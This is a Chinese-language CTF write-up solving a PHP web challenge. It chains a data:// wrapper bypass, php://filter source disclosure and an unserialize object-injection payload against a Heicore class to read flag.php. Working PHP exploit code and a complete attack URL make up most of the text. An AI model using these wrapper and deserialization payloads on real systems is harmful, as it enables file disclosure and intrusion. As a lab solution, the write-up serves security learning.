打开是个没用的网站,扫描一下~
访问/robots.txt,发现三个文件:
User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php
其中只有/relax.php里有东西,查看源码:
这个是aaencode代码,直接扔进控制台运行,或者在线解密:https://www.qtool.net/decode
整理得:
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
echo '<img src="./images/13.jpg" alt=""><br>';
include($__);
} else {
echo '<img src="./images/1.gif" alt="">';
}
其中file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"可以用data://伪协议绕过;
下面还有个include($__);,想用file=flag.php用include来包含flag,却回显“It’s not that simple”,是我太天真了!
于是构造php://filter伪协议来读取heicore.php和relax.php的源码
heicore.php:
<?php
class Heicore{
public $file;
public function __destruct(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
}
}
relax.php:
<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three"))
{
echo '<img src="./images/13.jpg" alt=""><br>';
if(preg_match("/flag/i",$__))
{
echo "It's not that simple";
exit();
}else{
include($__);
unserialize($___);
}
}else
echo '<img src="./images/1.gif" alt="">'; } ?>
终于拿到了完整的源码,的确是过滤了flag
可以看到heicore.php中的析构函数会输出$file,所以把它包含进来,并让其成员$file等于flag.php,由于调用了函数unserialize(),我们就利用反序列化触发魔术方法__destruct()来输出flag;
<?php
class Heicore {
public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$a = new Heicore();
$b = serialize($a);
echo $b;
#O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
构造的payload:
?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
解base64
587
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
